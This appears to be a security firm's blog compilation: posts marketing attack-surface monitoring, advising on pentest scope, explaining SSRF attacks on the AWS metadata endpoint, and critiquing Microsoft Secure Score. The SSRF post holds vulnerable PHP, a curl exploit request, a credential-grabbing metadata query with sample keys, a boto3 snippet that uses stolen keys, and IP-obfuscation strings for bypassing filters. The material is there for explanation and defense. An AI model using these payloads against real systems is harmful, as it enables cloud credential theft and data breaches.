Warning: This blog contains purposeful marketing and gratuitous plugs for SynerComm’s CASM™ Subscription services. Seriously though, the following article will present the need for better external visibility and vulnerability management.

Whether you run vulnerability scans to meet compliance requirements or as part of good security practice, the underlying need is the same: accurate, timely visibility into your exposures. At the time of this writing, there are essentially three equally capable and qualified scanning solutions: products from Tenable, Rapid7, and Qualys. My point is that each of these scanners, if configured correctly, should produce accurate and similar results. Therefore, as long as your scanning provider uses one of these three solutions, it should be able to detect vulnerabilities. SynerComm starts with a top scanner and then addresses the gaps your MSSP leaves behind.

Vulnerability scanning and analysis is a critical process within every information security program. Scanners should find missing patches, dangerous configurations, default passwords, and hundreds of other weaknesses. They work by probing systems over the network to determine whether each host exhibits specific vulnerabilities. While the process itself isn’t complicated, many organizations choose to outsource it to a managed service provider. If you need a provider or already have one, it’s time to upgrade to Continuous Attack Surface Management (CASM™).

Ditch your Vulnerability Scanning MSSP

Vulnerability scanning MSSPs served their role well for many years but failed to keep up. They failed to keep up with cloud migrations, failed to keep up with the rate of IT changes, and failed to provide tools that simplify and enable security for their subscribers.

VS-MSSPs Lack Discovery of New Assets

VS-MSSPs are Plagued with False Positives and Fail to Accurately Describe Risk 

VS-MSSPs Lack Security Expertise

The benefits of Continuous Attack Surface Management are summarized in the comparison table below.

If you’ve ever wondered what your systems and exposures look like to a cyber-criminal, just ask a pentester. SynerComm’s CASM® Engine was originally designed to provide accurate and timely reconnaissance information to our penetration testers. Access to this data and our ‘Findings-Based Reporting’ is available to all CASM® and Continuous Penetration Test subscribers. 

Learn more about our Continuous Attack Surface Management, SynerComm’s CASM® Engine, and our industry-leading Continuous Penetration Test subscriptions. 

| Capability | VS-MSSPs | SynerComm CASM® |
|---|---|---|
| Scheduled Scanning of Known Assets | ✔️ | ✔️ |
| Ad-Hoc (Manual) Scanning | ✔️ | ✔️ |
| 24/7 Online Dashboard Reporting | ✔️ | ✔️ |
| Discovery of New Assets | | ✔️ |
| Elimination of False-Positives | | ✔️ |
| Validated Findings | | ✔️ |
| Risk-Based Customizable Alerts | | ✔️ |
| Access to Penetration Testers | | ✔️ |


In penetration testing, it’s important to have an accurate scope and even more important to stick to it. This can be simple when the scope is limited to a company’s internet service provider (ISP) or ARIN-provided IP ranges. But in many cases, our clients’ public systems have grown to include multiple cloud-hosted servers, applications, and services. It may seem obvious to say that anything owned or managed by the company should be in scope for testing, but how do we know what is “owned or managed”? Ideally, we’d test everything that creates risk to an organization, but that isn’t always possible… read on.

I opened this article by stating that an accurate scope is critical to penetration testing. If the scope only includes the IP blocks provided by your ISP, you’re probably missing systems that should be tested. Alternatively, pentesting a system that you don’t have permission to test could land you in hot water. The good news is that hosting providers like Amazon Web Services (AWS) and Azure allow penetration testing of systems within your account. In other words, because you manage them, you have the right to pentest them. In these environments, pentesting your individual servers (or services) does not affect “neighboring” systems or the cloud host’s infrastructure.

In addition to the many compute and storage providers, you may also have websites and applications that are hosted and managed by a 3rd party. These still create risk to your company, but the hosting provider has complete control over who has permission to perform testing. When there is custom code or sensitive data at play, you should be seeking (written) permission to pentest/assess these systems and applications. If the host is unable or unwilling to allow testing, they should provide evidence of their own independent testing.

There are also going to be cloud systems that, despite creating risk to your organization, can’t be tested at all. This includes software as a service (SaaS) applications like Salesforce, SAP, and DocuSign.

And you guessed it… there are also systems like Azure AD, Microsoft 365, and CloudFlare that are not explicitly in scope, but whose controls may be unavoidable during external pentests. Microsoft 365 uses Azure AD, which is essentially a public extension of your on-premises (internal) Active Directory, complete with extremely high-performance authentication services. Most authentication attacks today take place directly against Azure AD because of its performance and public accessibility. In other words, an attacker could have your passwords before they ever touch a system on your network. Likewise, if your company uses CloudFlare to protect your websites and web applications, it inherently becomes part of the scope because testing those apps should force you through its proxy/controls.

Hopefully this information will help you plan for your next pentest or assessment. If your company maintains an accurate inventory of external systems that includes all of your data center and cloud systems, you’re already off to a great start. Still, there is always value in doing regular searches and discoveries for systems you may be missing. One method involves reviewing your external DNS to obtain a list of A and CNAME records for your domains (for ALL of your domains). By resolving all of your domains and subdomains, you can quickly build a large list of IP addresses that are in some way tied to your company. Now all you need to do is look up each IP to see what it’s hosting and who owns it. Easy, right?
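As a quick illustration of the resolution step (not SynerComm tooling), here is a minimal Python sketch using the dnspython package; the domain names are placeholders for your own list:

import dns.resolver

domains = ["example.com", "www.example.com", "vpn.example.com"]  # your full domain list

for name in domains:
    for rtype in ("A", "CNAME"):
        try:
            for rdata in dns.resolver.resolve(name, rtype):
                print(name, rtype, rdata)
        except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN):
            pass  # no record of this type for this name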

If you don’t already have a tool for looking up bulk lists of IP addresses, or you prefer not to paste a list of your company’s IP addresses into someone else’s website, we’ve got a solution. Whodat.py was written to take very large lists of IP addresses and perform a series of whois and geoip lookups. If the IP address is owned by Amazon or Microsoft, additional details on the service or data center get added based on the host’s online documentation. This tool was designed for regular use by our penetration testers, but its concepts and capabilities are a core functionality of our CASM Engine™ and our suite of Continuous Attack Surface Management and Continuous Penetration Testing subscriptions.
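Whodat.py itself isn’t reproduced here, but the core idea can be sketched in a few lines of Python with the ipwhois package (an illustrative assumption; the real tool’s internals may differ):

from ipwhois import IPWhois

ips = ["93.184.216.34", "52.96.0.1"]  # placeholder list of resolved addresses
for ip in ips:
    rdap = IPWhois(ip).lookup_rdap(depth=1)  # RDAP/whois lookup for ownership data
    print(ip, rdap.get("asn_description"), rdap.get("network", {}).get("name"))
    # geoip lookups (e.g., via a local geoip2 database) would follow the same batch pattern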

Bridging the Gap Between Point-in-Time Penetration Tests 

“So, let’s say we fix all of the vulnerabilities that the pentest discovers… How do we know tomorrow that we’re not vulnerable to something new?”

~Customer

Having been part of the penetration testing industry for over 15 years, I’ve been challenged by many clients with this very question. The fact is that they’re right: a penetration test is a point-in-time assessment, and new vulnerabilities are discovered every day. We hope that our patch and vulnerability management processes, along with our defensive controls (firewalls, etc.), keep our systems secure. Over the past 5 years, we’ve seen a rise in the number of clients moving toward quarterly penetration testing and recognizing the value of rotating through different penetration testers.

In 2017, SynerComm’s penetration testers decided to put their heads together to develop an even better solution. (Honestly, one of our top guys had been nudging me for two years with an idea already…) We agreed that nothing replaces the need for regular human-led penetration testing. As of today, no amount of automation or AI can come close to replicating the intuition and capabilities of an actual penetration tester. That said, if we can be confident that nothing (ok, very little) has changed since the last penetration test, we can be significantly more confident that new vulnerabilities are not present. Building on this idea, the continuous pentest was born.

Continuous pentesting combines the best of both worlds by using automation to continually monitor for changes and human pentesters to react to those changes quickly. Computers are great at monitoring IP addresses, services, websites, and DNS. They can also monitor breaches and data dumps for names, email addresses, and passwords. What makes continuous pentesting successful is taking action based on changes and using orchestration to determine whether additional scans should be run and whether a pentester should be alerted.
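A minimal sketch of that change-detection loop, assuming a simple TCP connect scan and a placeholder alerting hook (illustrative only, not SynerComm’s orchestration):

import json, socket

PORTS = (21, 22, 25, 80, 443, 3389, 8443)

def scan(host):
    open_ports = []
    for port in PORTS:
        with socket.socket() as s:  # TCP connect scan, one port at a time
            s.settimeout(1.0)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return sorted(open_ports)

def check(host, state_file="ports.json"):
    try:
        with open(state_file) as f:
            previous = json.load(f).get(host, [])
    except FileNotFoundError:
        previous = []
    current = scan(host)
    if current != previous:
        # A change: orchestration would queue deeper scans and alert a pentester
        print(f"CHANGE on {host}: {previous} -> {current}")
    with open(state_file, "w") as f:
        json.dump({host: current}, f)

check("www.example.com")  # placeholder hostname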

There is no replacement for the validation provided by a thorough, skilled, and human-led penetration test. External and internal pentests with social engineering demonstrate precisely how a determined and skilled intruder could breach your company’s systems and data. Continuous Penetration Testing focuses on public systems and online exposures and should always follow a full, human-led, external penetration test. Partner with SynerComm and we’ll keep an eye on your perimeter security year-round.

One of the greatest, yet seemingly unknown, dangers that face any cloud-based application is the deadly combination of an SSRF vulnerability and the AWS Metadata endpoint. As this write-up from Brian Krebs explains, the breach at Capital One was caused by an SSRF vulnerability that was able to reach the AWS Metadata endpoint and extract the temporary security credentials associated with the EC2 instance's IAM Role. These credentials enabled the attacker to access other Capital One assets in the cloud, and the result was that over 100 million credit card applications were compromised.

The purpose of this blog post is to explain the technical details of such a vulnerability and give some helpful suggestions for avoiding a similar situation in any organization.

The Vulnerabilities

In order to fully understand the impact of this cloud one-two punch, it is necessary to break down the attack chain into its two components: SSRF and the AWS Metadata endpoint. First, Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to control the destination address of an HTTP request sent from the vulnerable server. While this is not always the case (see Blind SSRF), the attacker can often see the response from the request as well. This allows the attacker to use the vulnerable server as a proxy for HTTP requests, which can result in the exposure of sensitive subnets and services.

Consider the following PHP code:

<?php
// Vulnerable: the 'hostname' GET parameter gives the attacker full control
// over the destination of this server-side HTTP request.
echo file_get_contents("http://".$_GET['hostname']."/configureIntegration.php");
?>

The code above sends an HTTP request to the hostname specified by the attacker in the "hostname" GET parameter. Logic like this is commonly found in the "Integrations" section of applications, and it is vulnerable to SSRF. Consider the following scenario: there is a sensitive service running on the loopback interface of the vulnerable server, emulated here by a simple HTTP server bound to 127.0.0.1 (shown in the listing below).

The PHP code above is hosted on the web server that faces the internet. When an attacker discovers this endpoint, he/she might use the following to grab the data from the internal application:

curl 'http://vulnerableserver.com/ssrf.php?hostname=localhost:8081/secret.html?'

Which would result in a hit on the internal HTTP server:

┬─[user@host:/t/secret]─[02:29:48 PM]
╰─>$ python3 -m http.server 8081 --bind 127.0.0.1
Serving HTTP on 127.0.0.1 port 8081 (http://127.0.0.1:8081/) ...
127.0.0.1 - - [15/Aug/2019 14:30:56] "GET /secret.html?/configureIntegration.php HTTP/1.0" 200 -

and return the following to the attacker:

This is only available on a loopback interface

Now that the danger of SSRF is clear, let's look at how this vulnerability may be exploited in the context of the cloud (AWS in particular).

Due to the dynamic nature of the cloud, server instances (EC2, for example) need some way to obtain basic information about their configuration in order to orient themselves to the environment they were spun up in. Out of this need, the AWS Metadata endpoint was born. This endpoint (169.254.169.254), when queried from any EC2 instance, reveals information about the configuration of that particular instance. Quite a lot of information is available via this endpoint, including the hostname, external IP address, metrics, LAN information, security groups, and, last but not least, the IAM (Identity and Access Management) credentials associated with the instance. It is possible to retrieve these security credentials by hitting the following URL, where [ROLE] is the IAM role name:

user@host:~$ curl 169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE]
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-15T18:13:44Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAN0P3n0W4y1nv4L1d",
  "SecretAccessKey" : "A5tGuw2QXjmqu8cTEu1zs0Dw8yt905HDCzrF0AdE",
  "Token" : "AgoJb3JpZ2luX2VjEJv//////////wEaCXVzLWVhc3QtMSJHMEUCIEX46oh4kz6AtBiTfvoHGqfVuHJI29ryAZy/wXyR51SAiEA04Pyw9HSwSIRNx6vmYpqm7sD+DkLQiFzajuwI2aLEp4q8gMIMxABGgwzNjY4OTY1NTU5NDkiDOBEJDdUKxKUkgkhGyrPA7u8oSds5hcIM0EeoHvgxvCX/ChiDsuCEFO1ctMpOgaQuunsvKLzuaTp/86V96iZzuoPLnpHHsmIUTrCcwwGqFzyaqvJpsFWdv89YIhARAMlcQ1Cc9Cs4pTBSYc/BvbEFb1z0xWqPlBNVKLMzm2K5409f/KCK/eJsxp530Zt7a1MEBp/rvceyiA5gg+6hOu65Um+4BNT+CjlEk3gwL6JUUWr9a2LKYxmyR4fc7XtLD2zB0jwdnG+EPv7aDPj7EoWMUoR/dOQav/oSHi7bl6+kT+koKzwhU/Q286qsk0kXMfG/U95TdUr70I3b/L/dhyaudpLENSU7uvPFi8qGVGpnCuZCvGL2JVSnzf8327jyuiTF7GvXlvUTh8bjxnZ8pAhqyyuxEW1tosL2NuqRHmlCCfnE3wLXJ0yBUr7uxMHTfL1gueEWghymIGhAxiYIKA9PPiHCDrn4gl5AGmLyzqxenZgcNnuwMjeTnhQ0mVf7L8PR4ZWRo9h3C1wMbYnYNi5rdfQcByMIN/XoR2J74sBPor/aObMMHVnmpNjbtRgKh0Vpi48VgXhXfuCAHka3rbYeOBYC8z8nUWYJKuxv3Nj0cQxXDnYT6LPPXmtHgZaBSUwxMHW6gU6tAHi8OEjskLZG81wLq1DiLbdPJilNrv5RPn3bBF+QkkB+URAQ8NBZA/z8mNnDfvESS44fMGFsfTIvIdANcihZQLo6VYvECV8Vw/QaLP/GbljKPwztRC5HSPe6WrC06LZS9yeTpVGZ6jFIn1O/01hJOgEwsK7+DDwcXtE5qtOynmOJiY/iUjcz79LWh184My58ueCNxJuzIM9Tbn0sH3l1eBxECTihDNbL13v5g+8ENaih+f3rNU=",
  "Expiration" : "2019-08-16T00:33:31Z"
}

The response contains several things: the AccessKeyId, SecretAccessKey, and Token for this account. Using these credentials, an attacker can authenticate to AWS and compromise the server and potentially many other assets. In the case of the Capital One breach, these credentials were used to access an S3 bucket which contained millions of records of user information.
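To illustrate how trivially the stolen values can be used (with the fake keys from the response above), an attacker could feed them straight into an AWS SDK session. This boto3 sketch is an assumption about attacker tooling, not a record of the Capital One attack:

import boto3

session = boto3.Session(
    aws_access_key_id="ASIAN0P3n0W4y1nv4L1d",  # AccessKeyId from the response
    aws_secret_access_key="A5tGuw2QXjmqu8cTEu1zs0Dw8yt905HDCzrF0AdE",
    aws_session_token="<the long Token value>",  # placeholder for the Token field
)
s3 = session.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    print(bucket["Name"])  # every bucket the stolen role is allowed to enumerate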

In summary, AWS's poor implementation of the metadata service allows an attacker to easily escalate an SSRF vulnerability into control of many different cloud assets. Other cloud providers like Google Cloud and Microsoft Azure also provide a metadata service endpoint, but requests to those endpoints require a special header. This prevents most SSRF vulnerabilities from reaching the sensitive data there.

How to prevent such a vulnerability

To prevent this type of vulnerability, firewall rules need to be put in place to block off the metadata endpoint. This can be done using the following iptables rule:

sudo iptables -A OUTPUT -d 169.254.169.254 -j DROP

This will prevent any access to this IP address. However, if access to the metadata endpoint is required, it is also possible to exempt certain users from this rule. For example, the iptables rule below allows only the root user to access the metadata endpoint:

sudo iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

These blocks MUST be done at the network level, not the application level. There are too many ways to express this IP address. For example, all of the addresses below refer to the metadata service:

http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
http://169.254.169.254.xip.io/ DNS Name
http://A.8.8.8.8.1time.169.254.169.254.1time.repeat.rebind.network/ DNS Rebinding (8.8.8.8 -> AWS Metadata)

And there are many more. The only reliable way to address this issue is through a network-level block of this IP.
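To see why application-level string matching fails, note that most of the forms above are just alternate encodings of the same 32-bit value; a quick Python check:

import socket, struct

ip = "169.254.169.254"
as_int = struct.unpack("!I", socket.inet_aton(ip))[0]
print(as_int)       # 2852039166 -> the dotless decimal form above
print(hex(as_int))  # 0xa9fea9fe -> the dotless hexadecimal form
# The OS, not your filter, decides what an address string means:
print(socket.inet_ntoa(struct.pack("!I", as_int)))  # back to 169.254.169.254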

The easiest way to check the IAM roles associated with each EC2 instance is to navigate to the EC2 Dashboard in AWS and add the column "IAM Instance Profile Name" by clicking the gear in the top right-hand corner. Once the IAM role for each EC2 instance is easily visible, it is possible to check these roles to see if they are overly permissive for what is required of that EC2 instance.
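If you'd rather script the review than click through the console, a short boto3 sketch (assuming AWS credentials are configured locally) lists each instance alongside its instance profile:

import boto3

ec2 = boto3.client("ec2")
for reservation in ec2.describe_instances()["Reservations"]:
    for instance in reservation["Instances"]:
        # Instances with no role attached have no IamInstanceProfile key
        profile = instance.get("IamInstanceProfile", {}).get("Arn", "(none)")
        print(instance["InstanceId"], profile)
# Note: production code should paginate describe_instances for large accounts.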

It is also imperative to understand the pivoting potential of these IAM Roles. If it is possible that an SSRF, XXE, or RCE vulnerability was exploited on any cloud system, the logs for the IAM Role associated with that instance must be thoroughly audited for malicious activity.
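As a starting point for such an audit, recent CloudTrail events for the suspect session can be pulled with boto3. The instance ID used as the Username value below is a placeholder (instance role sessions are typically named after the instance ID):

import boto3

cloudtrail = boto3.client("cloudtrail")
response = cloudtrail.lookup_events(
    LookupAttributes=[{"AttributeKey": "Username",
                       "AttributeValue": "i-0123456789abcdef0"}],  # placeholder session name
    MaxResults=50,
)
for event in response["Events"]:
    print(event["EventTime"], event["EventName"], event.get("Username"))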

Microsoft Secure Score. If you’re an IT administrator or security professional in an organization that uses Office 365, then you’ve no doubt used the tool or at least heard the term. It started as Office 365 Secure Score, but it was renamed in April 2018 to reflect a wider range of elements being scored.

What does it do? The tool looks at configurable settings and actions primarily within your Office 365 and Azure AD environment, and awards points for selections that meet best practices. In their words, “From a centralized dashboard you can monitor and improve the security for your Microsoft 365 identities, data, apps, devices, and infrastructure.”

But what doesn’t Microsoft Secure Score do? Microsoft is very good at telling you the great things its products can do, so I won’t repeat them here. The concept is sound, and I applaud them for giving users a tool that prioritizes secure configurations. They have come a long way from having auditing turned off by default in their products, e.g., Server 2000. I will point out why Microsoft Secure Score isn’t enough when it comes to understanding and testing the security of your Microsoft 365 environment.

Reason number 1:  The fox shouldn’t guard the hen house.

I am a Certified Public Accountant (CPA), and as such, I’ve spent a good portion of my life performing audits and assessments. A key independence rule CPAs abide by is: an auditor must not audit his or her own work. Microsoft isn’t exactly independent when scoring its own product’s settings and capabilities. The financial motivation exists for Microsoft to set up a scoring system that makes users feel good about using Microsoft products. Interoperability and performance will always be a higher priority than security.

This fact is furthered by the scoring system’s setup, which unlocks higher point opportunities with higher-priced subscriptions. For example, Microsoft Cloud App Security and Azure Advanced Threat Protection are unlocked with E5 licenses, or as a $5.50 per-user-per-month add-on to an existing E3 license. This can be as much as a 70% price increase. If you want more chances to raise your overall score and a higher score ceiling, spend more money… a very beneficial side effect for Microsoft.

Also, remember that Secure Score is reflective of a Microsoft opinion and their subjective value for security controls they believe are important. This differs from widely accepted standards from organizations like NIST (National Institute of Standards and Technology) or CIS (Center for Internet Security) which are vendor neutral and have been refined, improved, and evolved over time.

Reason number 2:  No two environments are alike.

First let me say that Secure Score can be dented and bent to fit different environments. Scoring for certain areas can be manually entered if you have a third-party solution for a control, though it is incumbent on the person checking those controls to match what Secure Score is asking for. This is an all-or-nothing proposition, as indicated within Secure Score: “Marking as resolved through third-party indicates that you have completed this action in a non-Microsoft app, and will give you the full point value of this action.”

This is a key area where the Secure Score blanket fails to keep all areas of the entity covered and warm. There are bound to be components and configuration requirements that don’t quite fit what Secure Score evaluates or how it is scored. Think of the myriad of application combinations to handle Customer Relationship Management (CRM), Mobile Device Management (MDM), Security Information and Event Management (SIEM), Data Loss Prevention (DLP), and Multifactor Authentication (MFA) just to name a few.  An independent assessment of the environment that references best practice hardening guides for specific products comprising the solution is the only way to complete a proper evaluation.

Reason number 3:  Security is a journey, and a scorecard makes it a destination.

Don’t get me wrong, I like scores and grades. CPAs generally like to measure and quantify things. Secure Score quantifies security, gives you trends over time on your score, and even allows you to measure your score against others based on a global average, industry average, and similar seat-count average.

What I don’t like is how the scores can be manipulated, or how they can be misconstrued. If the O365 administrator wants to improve their percentage of points achieved, the simplest way is to select “ignore” for the scoring areas where they have earned 0 points. Per Secure Score documentation, “Once you ignore an improvement action, it will no longer count toward the total Secure score points you have available.” Lower the denominator, keep the numerator, and poof! We are more secure. Or are we?
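Using this article's own numbers as a hypothetical, a quick calculation shows how ignoring unearned actions inflates the percentage without changing anything:

earned, available = 650, 807
print(f"{earned / available:.1%}")  # 80.5%
available -= 100                    # "ignore" 100 points of unearned actions
print(f"{earned / available:.1%}")  # 91.9% -- "more secure" without changing a thing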

Executives looking at a scorecard may also be satisfied once it has reached a certain percentage of the total available. A project which will move the Secure Score from 650 out of 807 points to 710 out of 807 points appears to make the company about 8% more secure to a non-security decision maker handling the company budget. That project may not make the cut. In reality, any scoring shortage could represent a critical configuration issue that puts information assets at risk. That point may get lost if the focus is score.

Reason number 4:  A by-product of automated security is a false sense of it.

We hear stories all the time about breach activities that were being reported by automated logging systems, except no one was looking at the logs. IT management puts a tool in place and checks a box that implies the organization is secure in that area. Secure Score is ripe for this. Several improvement actions that will increase your score involve reviewing reports. When a link for a report is clicked, Secure Score assumes the report was reviewed and awards points. To keep the points, the link must be clicked within specific time intervals from within the Secure Score user interface, but this process does not record what was reviewed, or any notes or actions resulting from the review. There is no substitute for the actual review process and confirming that the review is happening.


Also consider an environment made up of multiple applications from different vendors where automated security evaluations, like Secure Score, are put in place. Each application that makes up the system interacts with other applications, potentially creating security control blind spots. For example, consider an email system that hands off outbound email to a 3rd-party DLP solution. Are there security holes in the process that transfers data in and out of the DLP application? Identifying those weaknesses requires a holistic view, measured against current accepted best practices, that just isn’t offered by Secure Score or any other automated solution.

In conclusion, I think Secure Score has a place in monitoring and evaluating an organization’s information security posture. Microsoft is taking recommendations from its user base and is working to improve Secure Score’s results and widen its coverage. It is a barometer of an information security environment that could produce important information when properly utilized.  

The bottom line though is that it is just one tool. It cannot replace a diligent information security program or, at a higher level, an information security management system. Independent assessment and review of controls, policies, procedures, and the people managing the environment work in tandem to assure the confidentiality, integrity, and availability of an organization’s information assets. Consider the diversity of an organization’s landscape.

The areas that make up that landscape are all interdependent, yet each has its own unique traits and ways to be assessed and secured. No one measurement tool is enough.

By Jeffrey T. Lemmermann, CPA, CISA, CITP, CEH - Information Assurance Consultant
